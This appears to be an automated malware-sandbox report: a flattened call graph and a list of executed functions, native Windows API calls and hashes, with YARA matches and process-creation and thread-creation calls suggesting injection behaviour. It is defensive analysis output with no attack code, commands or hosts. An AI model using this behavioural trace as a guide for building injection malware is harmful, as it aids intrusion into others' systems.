2efabe0 LdrLoadDll 27007->27008 27009 2efaea5 27008->27009 27010 2efabe0 LdrLoadDll 27009->27010 27011 2efaeae 27010->27011 27012 2efabe0 LdrLoadDll 27011->27012 27013 2efaeba 27012->27013 27014 2efabe0 LdrLoadDll 27013->27014 27015 2efaec3 27014->27015 27016 2efabe0 LdrLoadDll 27015->27016 27017 2efaecc 27016->27017 27017->26792 27019 2efaf60 LdrLoadDll 27018->27019 27020 2ef9e8c 27019->27020 27048 4c09860 LdrInitializeThunk 27020->27048 27021 2ef9ea3 27021->26714 27023->26789 27025 2efa50c NtAllocateVirtualMemory 27024->27025 27026 2efaf60 LdrLoadDll 27024->27026 27025->26895 27026->27025 27028 2efd0a6 27027->27028 27029 2efd0a0 27027->27029 27030 2efc0b0 2 API calls 27028->27030 27029->26901 27031 2efd0cc 27030->27031 27031->26901 27033 2efd130 27032->27033 27034 2efd18d 27033->27034 27035 2efc0b0 2 API calls 27033->27035 27034->26909 27036 2efd16a 27035->27036 27037 2efbee0 2 API calls 27036->27037 27037->27034 27039 2efbee0 2 API calls 27038->27039 27040 2ef4f74 27039->27040 27040->26920 27041->26905 27043 2efabfb 27042->27043 27044 2ef5a90 LdrLoadDll 27043->27044 27045 2efac1b 27044->27045 27046 2ef5a90 LdrLoadDll 27045->27046 27047 2efaccf 27045->27047 27046->27047 27047->26941 27048->27021 27050 4c09681 27049->27050 27051 4c0968f LdrInitializeThunk 27049->27051 27050->26798 27051->26798 27053 2efa63c RtlFreeHeap 27052->27053 27054 2efaf60 LdrLoadDll 27052->27054 27053->26802 27054->27053 27056 2ee721b 27055->27056 27057 2ee7220 27055->27057 27056->26722 27058 2efbe60 2 API calls 27057->27058 27064 2ee7245 27058->27064 27059 2ee72a8 27059->26722 27060 2ef9e70 2 API calls 27060->27064 27061 2ee72ae 27063 2ee72d4 27061->27063 27065 2efa570 2 API calls 27061->27065 27063->26722 27064->27059 27064->27060 27064->27061 27066 2efbe60 2 API calls 27064->27066 27071 2efa570 27064->27071 27067 2ee72c5 27065->27067 27066->27064 27067->26722 27069 2efa570 2 API calls 27068->27069 27070 2ee74ee 27069->27070 27070->26679 27072 2efa58c 27071->27072 27073 2efaf60 LdrLoadDll 27071->27073 27076 4c096e0 LdrInitializeThunk 27072->27076 27073->27072 27074 2efa5a3 27074->27064 27076->27074 27078 2efb623 27077->27078 27081 2eea130 27078->27081 27080 2ee906b 27080->26687 27083 2eea154 27081->27083 27082 2eea15b 27082->27080 27083->27082 27084 2eea1a7 27083->27084 27085 2eea190 LdrLoadDll 27083->27085 27084->27080 27085->27084 27087 2eea4a3 27086->27087 27089 2eea520 27087->27089 27101 2ef9c40 LdrLoadDll 27087->27101 27089->26692 27091 2efaf60 LdrLoadDll 27090->27091 27092 2eed59b 27091->27092 27092->26695 27093 2efa780 27092->27093 27094 2efaf60 LdrLoadDll 27093->27094 27095 2efa79f LookupPrivilegeValueW 27094->27095 27095->26697 27097 2efa22c 27096->27097 27098 2efaf60 LdrLoadDll 27096->27098 27102 4c09910 LdrInitializeThunk 27097->27102 27098->27097 27099 2efa24b 27099->26698 27101->27089 27102->27099 27104 2eea627 27103->27104 27105 2eea480 LdrLoadDll 27104->27105 27106 2eea656 27105->27106 27106->26638 27108 2eea374 27107->27108 27163 2ef9c40 LdrLoadDll 27108->27163 27110 2eea3ae 27110->26640 27112 2eed78c 27111->27112 27113 2eea600 LdrLoadDll 27112->27113 27114 2eed79e 27113->27114 27164 2eed670 27114->27164 27117 2eed7b9 27120 2eed7c4 27117->27120 27121 2efa440 2 API calls 27117->27121 27118 2eed7d1 27119 2eed7e2 27118->27119 27122 2efa440 2 API calls 27118->27122 27119->26644 27120->26644 27121->27120 27122->27119 27124 2eeb4d6 27123->27124 27125 2eeb4e0 27123->27125 27124->26653 27126 2eea480 LdrLoadDll 27125->27126 27127 2eeb551 27126->27127 27128 2eea350 LdrLoadDll 27127->27128 27129 2eeb565 27128->27129 27130 2eeb588 27129->27130 27131 2eea480 LdrLoadDll 27129->27131 27130->26653 27132 2eeb5a4 27131->27132 27133 2ef5690 9 API calls 27132->27133 27134 2eeb5f9 27133->27134 27134->26653 27136 2eec056 27135->27136 27137 2eea480 LdrLoadDll 27136->27137 27138 2eec06a 27137->27138 27184 2eebd20 27138->27184 27140 2ee858c 27161 2eeb610 LdrLoadDll 27140->27161 27213 2eeda20 27141->27213 27143 2ee8233 27157 2ee8431 27143->27157 27218 2ef4fe0 27143->27218 27145 2ee8292 27145->27157 27221 2ee7fd0 27145->27221 27148 2efd090 2 API calls 27149 2ee82d9 27148->27149 27150 2efd1c0 3 API calls 27149->27150 27153 2ee82ee 27150->27153 27151 2ee7210 4 API calls 27152 2ee8340 27151->27152 27152->27151 27152->27157 27159 2ee74d0 2 API calls 27152->27159 27226 2eeb1f0 27152->27226 27276 2eed9c0 27152->27276 27281 2eed4a0 22 API calls 27152->27281 27153->27152 27280 2ee3660 11 API calls 27153->27280 27157->26642 27159->27152 27160->26647 27161->26658 27162->26663 27163->27110 27165 2eed68a 27164->27165 27173 2eed740 27164->27173 27166 2eea480 LdrLoadDll 27165->27166 27167 2eed6ac 27166->27167 27174 2ef9ef0 27167->27174 27169 2eed6ee 27177 2ef9f30 27169->27177 27172 2efa440 2 API calls 27172->27173 27173->27117 27173->27118 27175 2ef9f0c 27174->27175 27176 2efaf60 LdrLoadDll 27174->27176 27175->27169 27176->27175 27178 2ef9f3f 27177->27178 27179 2efaf60 LdrLoadDll 27178->27179 27180 2ef9f4c 27179->27180 27183 4c09fe0 LdrInitializeThunk 27180->27183 27181 2eed734 27181->27172 27183->27181 27185 2eebd37 27184->27185 27193 2eeda60 27185->27193 27189 2eebdab 27190 2eebdb2 27189->27190 27204 2efa250 LdrLoadDll 27189->27204 27190->27140 27192 2eebdc5 27192->27140 27194 2eeda85 27193->27194 27205 2ee7510 27194->27205 27196 2eedaa9 27197 2ef5690 9 API calls 27196->27197 27198 2eebd7f 27196->27198 27200 2efbee0 2 API calls 27196->27200 27212 2eed8a0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 27196->27212 27197->27196 27201 2efa690 27198->27201 27200->27196 27202 2efa6af CreateProcessInternalW 27201->27202 27203 2efaf60 LdrLoadDll 27201->27203 27202->27189 27203->27202 27204->27192 27206 2ee760f 27205->27206 27207 2ee7525 27205->27207 27206->27196 27207->27206 27208 2ef5690 9 API calls 27207->27208 27209 2ee7592 27208->27209 27210 2efbee0 2 API calls 27209->27210 27211 2ee75b9 27209->27211 27210->27211 27211->27196 27212->27196 27214 2ef5a90 LdrLoadDll 27213->27214 27215 2eeda3f 27214->27215 27216 2eeda4d 27215->27216 27217 2eeda46 SetErrorMode 27215->27217 27216->27143 27217->27216 27282 2eed7f0 27218->27282 27220 2ef5006 27220->27145 27222 2efbe60 2 API calls 27221->27222 27225 2ee7ff5 27221->27225 27222->27225 27223 2ee8210 27223->27148 27225->27223 27301 2ef9830 27225->27301 27227 2eeb209 27226->27227 27228 2eeb20f 27226->27228 27349 2eed2b0 27227->27349 27358 2ee8c20 27228->27358 27231 2eeb21c 27232 2efd1c0 3 API calls 27231->27232 27275 2eeb4b2 27231->27275 27233 2eeb238 27232->27233 27234 2eeb24c 27233->27234 27235 2eed9c0 2 API calls 27233->27235 27367 2ef9cc0 27234->27367 27235->27234 27238 2eeb380 27383 2eeb190 LdrLoadDll LdrInitializeThunk 27238->27383 27239 2ef9eb0 2 API calls 27240 2eeb2ca 27239->27240 27240->27238 27246 2eeb2d6 27240->27246 27242 2eeb39f 27243 2eeb3a7 27242->27243 27384 2eeb100 LdrLoadDll NtClose LdrInitializeThunk 27242->27384 27244 2efa440 2 API calls 27243->27244 27247 2eeb3b1 27244->27247 27249 2eeb329 27246->27249 27252 2ef9fc0 2 API calls 27246->27252 27246->27275 27247->27152 27248 2eeb3c9 27248->27243 27251 2eeb3d0 27248->27251 27250 2efa440 2 API calls 27249->27250 27253 2eeb346 27250->27253 27254 2eeb3e8 27251->27254 27385 2eeb080 LdrLoadDll LdrInitializeThunk 27251->27385 27252->27249 27370 2ef92e0 27253->27370 27386 2ef9d40 LdrLoadDll 27254->27386 27258 2eeb35d 27258->27275 27373 2ee7680 27258->27373 27259 2eeb3fc 27387 2eeaf00 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 27259->27387 27261 2eeb420 27263 2eeb46d 27261->27263 27388 2ef9d70 LdrLoadDll 27261->27388 27390 2ef9dd0 LdrLoadDll 27263->27390 27267 2eeb43e 27267->27263 27389 2ef9e00 LdrLoadDll 27267->27389 27268 2eeb47b 27269 2efa440 2 API calls 27268->27269 27270 2eeb485 27269->27270 27272 2efa440 2 API calls 27270->27272 27273 2eeb48f 27272->27273 27274 2ee7680 3 API calls 27273->27274 27273->27275 27274->27275 27275->27152 27277 2eed9d3 27276->27277 27464 2ef9e40 27277->27464 27280->27152 27281->27152 27283 2eed80d 27282->27283 27289 2ef9f70 27283->27289 27286 2eed855 27286->27220 27290 2efaf60 LdrLoadDll 27289->27290 27291 2ef9f8c 27290->27291 27299 4c099a0 LdrInitializeThunk 27291->27299 27292 2eed84e 27292->27286 27294 2ef9fc0 27292->27294 27295 2efaf60 LdrLoadDll 27294->27295 27296 2ef9fdc 27295->27296 27300 4c09780 LdrInitializeThunk 27296->27300 27297 2eed87e 27297->27220 27299->27292 27300->27297 27302 2efc0b0 2 API calls 27301->27302 27303 2ef9847 27302->27303 27322 2ee8760 27303->27322 27305 2ef9862 27306 2ef9889 27305->27306 27307 2ef98a0 27305->27307 27308 2efbee0 2 API calls 27306->27308 27309 2efbe60 2 API calls 27307->27309 27310 2ef9896 27308->27310 27311 2ef98da 27309->27311 27310->27223 27312 2efbe60 2 API calls 27311->27312 27313 2ef98f3 27312->27313 27319 2ef9b94 27313->27319 27328 2efbea0 LdrLoadDll 27313->27328 27315 2ef9b79 27316 2ef9b80 27315->27316 27315->27319 27317 2efbee0 2 API calls 27316->27317 27318 2ef9b8a 27317->27318 27318->27223 27320 2efbee0 2 API calls 27319->27320 27321 2ef9be9 27320->27321 27321->27223 27323 2ee8785 27322->27323 27324 2eea130 LdrLoadDll 27323->27324 27325 2ee87b8 27324->27325 27327 2ee87dd 27325->27327 27329 2eeb930 27325->27329 27327->27305 27328->27315 27330 2eeb95c 27329->27330 27331 2efa190 LdrLoadDll 27330->27331 27332 2eeb975 27331->27332 27333 2eeb97c 27332->27333 27340 2efa1d0 27332->27340 27333->27327 27337 2eeb9b7 27338 2efa440 2 API calls 27337->27338 27339 2eeb9da 27338->27339 27339->27327 27341 2efa1ec 27340->27341 27342 2efaf60 LdrLoadDll 27340->27342 27348 4c09710 LdrInitializeThunk 27341->27348 27342->27341 27343 2eeb99f 27343->27333 27345 2efa7c0 27343->27345 27346 2efa7df 27345->27346 27347 2efaf60 LdrLoadDll 27345->27347 27346->27337 27347->27346 27348->27343 27350 2eed2c7 27349->27350 27391 2eec3a0 27349->27391 27352 2eed2e0 27350->27352 27404 2ee4000 27350->27404 27353 2efc0b0 2 API calls 27352->27353 27355 2eed2ee 27353->27355 27355->27228 27356 2eed2da 27431 2ef9160 27356->27431 27360 2ee8c29 27358->27360 27359 2ee8d5b 27359->27231 27360->27359 27361 2eed670 3 API calls 27360->27361 27362 2ee8d3c 27361->27362 27363 2ee8d6a 27362->27363 27364 2efa440 2 API calls 27362->27364 27366 2ee8d51 27362->27366 27363->27231 27364->27366 27463 2ee6290 LdrLoadDll 27366->27463 27368 2efaf60 LdrLoadDll 27367->27368 27369 2eeb2a0 27368->27369 27369->27238 27369->27239 27369->27275 27371 2eed9c0 2 API calls 27370->27371 27372 2ef9312 27371->27372 27372->27258 27374 2ee7698 27373->27374 27375 2eea130 LdrLoadDll 27374->27375 27376 2ee76b3 27375->27376 27377 2ef5a90 LdrLoadDll 27376->27377 27378 2ee76c3 27377->27378 27379 2ee76fd 27378->27379 27380 2ee76cc PostThreadMessageW 27378->27380 27379->27152 27380->27379 27381 2ee76e0 27380->27381 27382 2ee76ea PostThreadMessageW 27381->27382 27382->27379 27383->27242 27384->27248 27385->27254 27386->27259 27387->27261 27388->27267 27389->27263 27390->27268 27392 2eec3d3 27391->27392 27436 2eea740 27392->27436 27394 2eec3e5 27440 2eea8b0 27394->27440 27396 2eec403 27397 2eea8b0 LdrLoadDll 27396->27397 27398 2eec419 27397->27398 27399 2eed7f0 3 API calls 27398->27399 27400 2eec43d 27399->27400 27401 2eec444 27400->27401 27402 2efc0f0 2 API calls 27400->27402 27401->27350 27403 2eec454 27402->27403 27403->27350 27405 2ee402c 27404->27405 27406 2eeb930 3 API calls 27405->27406 27408 2ee4103 27406->27408 27407 2ee4695 27407->27356 27408->27407 27443 2efc130 27408->27443 27410 2ee416e 27411 2eea480 LdrLoadDll 27410->27411 27412 2ee42f4 27411->27412 27413 2eea480 LdrLoadDll 27412->27413 27414 2ee4318 27413->27414 27447 2eeb9f0 27414->27447 27418 2ee43b3 27419 2ee4479 27418->27419 27420 2eeb9f0 2 API calls 27418->27420 27422 2efbe60 2 API calls 27419->27422 27421 2ee4452 27420->27421 27421->27419 27424 2efa0d0 2 API calls 27421->27424 27423 2ee44e6 27422->27423 27425 2efbe60 2 API calls 27423->27425 27424->27419 27426 2ee44ff 27425->27426 27426->27407 27427 2eea480 LdrLoadDll 27426->27427 27428 2ee4547 27427->27428 27429 2eea350 LdrLoadDll 27428->27429 27430 2ee45f9 27429->27430 27430->27356 27432 2ef5a90 LdrLoadDll 27431->27432 27433 2ef9181 27432->27433 27434 2ef91a7 27433->27434 27435 2ef9194 CreateThread 27433->27435 27434->27352 27435->27352 27437 2eea74a 27436->27437 27438 2eea480 LdrLoadDll 27437->27438 27439 2eea7a3 27438->27439 27439->27394 27441 2eea480 LdrLoadDll 27440->27441 27442 2eea8c9 27441->27442 27442->27396 27444 2efc13d 27443->27444 27445 2ef5a90 LdrLoadDll 27444->27445 27446 2efc150 27445->27446 27446->27410 27448 2eeba15 27447->27448 27456 2efa040 27448->27456 27451 2efa0d0 27452 2efaf60 LdrLoadDll 27451->27452 27453 2efa0ec 27452->27453 27462 4c09650 LdrInitializeThunk 27453->27462 27454 2efa10b 27454->27418 27457 2efaf60 LdrLoadDll 27456->27457 27458 2efa05c 27457->27458 27461 4c096d0 LdrInitializeThunk 27458->27461 27459 2ee438c 27459->27418 27459->27451 27461->27459 27462->27454 27463->27359 27465 2efaf60 LdrLoadDll 27464->27465 27466 2ef9e5c 27465->27466 27469 4c09840 LdrInitializeThunk 27466->27469 27467 2eed9fe 27467->27152 27469->27467 27470 2ef9030 27471 2efbe60 2 API calls 27470->27471 27473 2ef906b 27470->27473 27471->27473 27472 2ef914c 27473->27472 27474 2eea130 LdrLoadDll 27473->27474 27475 2ef90a1 27474->27475 27476 2ef5a90 LdrLoadDll 27475->27476 27478 2ef90bd 27476->27478 27477 2ef90d0 Sleep 27477->27478 27478->27472 27478->27477 27481 2ef8c60 LdrLoadDll 27478->27481 27482 2ef8e60 LdrLoadDll 27478->27482 27481->27478 27482->27478

              Executed Functions

              Function 02EFA368 Relevance: 1.6, APIs: 1, Instructions: 70filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 658 2efa368-2efa36f 659 2efa3c6-2efa409 call 2efaf60 NtReadFile 658->659 660 2efa371-2efa3b9 call 2efaf60 658->660 660->659
              APIs
              • NtReadFile.NTDLL(02EF59B2,5DA515B3,FFFFFFFF,02EF5671,00000206,?,02EF59B2,00000206,02EF5671,FFFFFFFF,5DA515B3,02EF59B2,00000206,00000000), ref: 02EFA405
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: c6ba91e9cbaa23041456f47e41bd978e5c7a97a281cd564fb88d5fea20e9b5f2
              • Instruction ID: c531e1599aea2744d86400a33628be371ca66ba34d0b35fa58094088cc32681b
              • Opcode Fuzzy Hash: c6ba91e9cbaa23041456f47e41bd978e5c7a97a281cd564fb88d5fea20e9b5f2
              • Instruction Fuzzy Hash: AE21B6B2200108AFCB14DF99DC84EEB77ADEF8C754F158258BA0DA7241D630E811CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA30A Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 706 2efa30a-2efa361 call 2efaf60 NtCreateFile
              APIs
              • NtCreateFile.NTDLL(00000060,00000005,00000000,02EF57F7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,02EF57F7,00000000,00000005,00000060,00000000,00000000), ref: 02EFA35D
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: ccc7fd84b4b5042ce2a941d3682eed9b089ce89de2695920edf379e2f5522b3b
              • Instruction ID: f2d9b78cc215928338e98959d2dabf52ccecfc8bc9ae57c78a8cf47449ddab83
              • Opcode Fuzzy Hash: ccc7fd84b4b5042ce2a941d3682eed9b089ce89de2695920edf379e2f5522b3b
              • Instruction Fuzzy Hash: 2601AFB6241508AFCB58CF99DC85EEB77A9EF8C754F118258BA0DD7240C630E855CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA310 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
              Download Yara Rule
              APIs
              • NtCreateFile.NTDLL(00000060,00000005,00000000,02EF57F7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,02EF57F7,00000000,00000005,00000060,00000000,00000000), ref: 02EFA35D
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
              • Instruction ID: 8083525e2ae82b7452f4110d1ee16491cae29089d692d19010d107587abcfbd9
              • Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
              • Instruction Fuzzy Hash: C3F06DB6215208AFCB48DF89DC85EEB77ADAF8C754F118258BA0D97241D630F8518BA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA3C0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
              Download Yara Rule
              APIs
              • NtReadFile.NTDLL(02EF59B2,5DA515B3,FFFFFFFF,02EF5671,00000206,?,02EF59B2,00000206,02EF5671,FFFFFFFF,5DA515B3,02EF59B2,00000206,00000000), ref: 02EFA405
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
              • Instruction ID: 52430b19662c5539141218e5c0ee52ee062031bbf0ff76c8e836df1a8d0d17a2
              • Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
              • Instruction Fuzzy Hash: C9F0A4B2200208ABCB14DF99DC84EEB77ADEF8C754F118258BA0D97241D630E811CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA4EA Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
              Download Yara Rule
              APIs
              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02EE2D11,00002000,00003000,00000004), ref: 02EFA529
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: 28ec41224c71cc0fb6414f2a2324e9c38f229e888071986477ff18e23a59ac25
              • Instruction ID: 6ff9025b49a48478d01eb61ef17e559ec831b4a70fbbbacf16d82c1a0e452fc1
              • Opcode Fuzzy Hash: 28ec41224c71cc0fb6414f2a2324e9c38f229e888071986477ff18e23a59ac25
              • Instruction Fuzzy Hash: D4F0F2B2210109AFDB14DF99DC85EAB7BA9EF88354F118259FA0C9B241C631E911CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA4F0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
              Download Yara Rule
              APIs
              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02EE2D11,00002000,00003000,00000004), ref: 02EFA529
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
              • Instruction ID: aba22e8d0700dbef38fed856221fe2750005a84bafcd090764c551478d0b4308
              • Opcode Fuzzy Hash: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
              • Instruction Fuzzy Hash: 1FF0F2B2210208ABDB14DF89DC80EAB77ADAF88654F118118BA089B241C630E8108BA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA43A Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
              Download Yara Rule
              APIs
              • NtClose.NTDLL(02EF5990,00000206,?,02EF5990,00000005,FFFFFFFF), ref: 02EFA465
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: d6a151c64568462a05cea6193ecec02a764c845c955953fcf4809a2f59c8f4a7
              • Instruction ID: 0cae3ce04f4bd245f371e546b5ee4a0857460e288ddf3a2df3b45534c528154f
              • Opcode Fuzzy Hash: d6a151c64568462a05cea6193ecec02a764c845c955953fcf4809a2f59c8f4a7
              • Instruction Fuzzy Hash: 69E08C72244204ABD610EF94DCC6E977BA9DF48620F2180A5FA085B241D531E5008AE0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA440 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
              Download Yara Rule
              APIs
              • NtClose.NTDLL(02EF5990,00000206,?,02EF5990,00000005,FFFFFFFF), ref: 02EFA465
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
              • Instruction ID: a6ed42ad79497b0fb7472c802e426e5d27b25fd025802963a39d8eb9e0e56357
              • Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
              • Instruction Fuzzy Hash: 6ED01772240218ABD620EB99DC89E977BADDF48A60F118065BA4C5B342C530FA008AE0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C09840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 41e8e47399a5abba5e68fe878d0cb6d5c63a9645c79409749a49b2188411509e
              • Instruction ID: a227e3c8c09bec971612e1613f0a4575cbc1237b0f80aa5ce7f2d928f5ff396d
              • Opcode Fuzzy Hash: 41e8e47399a5abba5e68fe878d0cb6d5c63a9645c79409749a49b2188411509e
              • Instruction Fuzzy Hash: AC9002A1242092527545B15944145074507A7E12857A1C412A1415951C8566F856F661
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C09860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 81be594b6952e173159c7efb674d8fea12a5396d26837eec772ceb612ec3f274
              • Instruction ID: b772f8075a62027cf426aec9de967c847085f156e3f5f7d576fc3190a183fe69
              • Opcode Fuzzy Hash: 81be594b6952e173159c7efb674d8fea12a5396d26837eec772ceb612ec3f274
              • Instruction Fuzzy Hash: 419002B120105513F11161594514707050A97D1285FA1C812A0425559D9696E952B161
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C095D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 3d598babdf89225522d537d31b4cff3c4402c644fd404887baab68269cfff404
              • Instruction ID: 7c283b4cdc6f358e8143e191de31e1da95908a604fd2ae23359fcde58331da8b
              • Opcode Fuzzy Hash: 3d598babdf89225522d537d31b4cff3c4402c644fd404887baab68269cfff404
              • Instruction Fuzzy Hash: 8A9002E120205103610571594424616450B97E1245B61C421E1015591DC565E8917165
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C099A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 4016eaf15131eb311ec28a1f7a4c7bcab14086d9cfe5dd52e3b72e23eb2316c7
              • Instruction ID: 03afc58a9e3b3a26398566927e871afe35d65e1de0e2554c007a5fcc78e9c6c9
              • Opcode Fuzzy Hash: 4016eaf15131eb311ec28a1f7a4c7bcab14086d9cfe5dd52e3b72e23eb2316c7
              • Instruction Fuzzy Hash: 3C9002E134105542F10061594424B060506D7E2345F61C415E1065555D8659EC527166
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C09540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
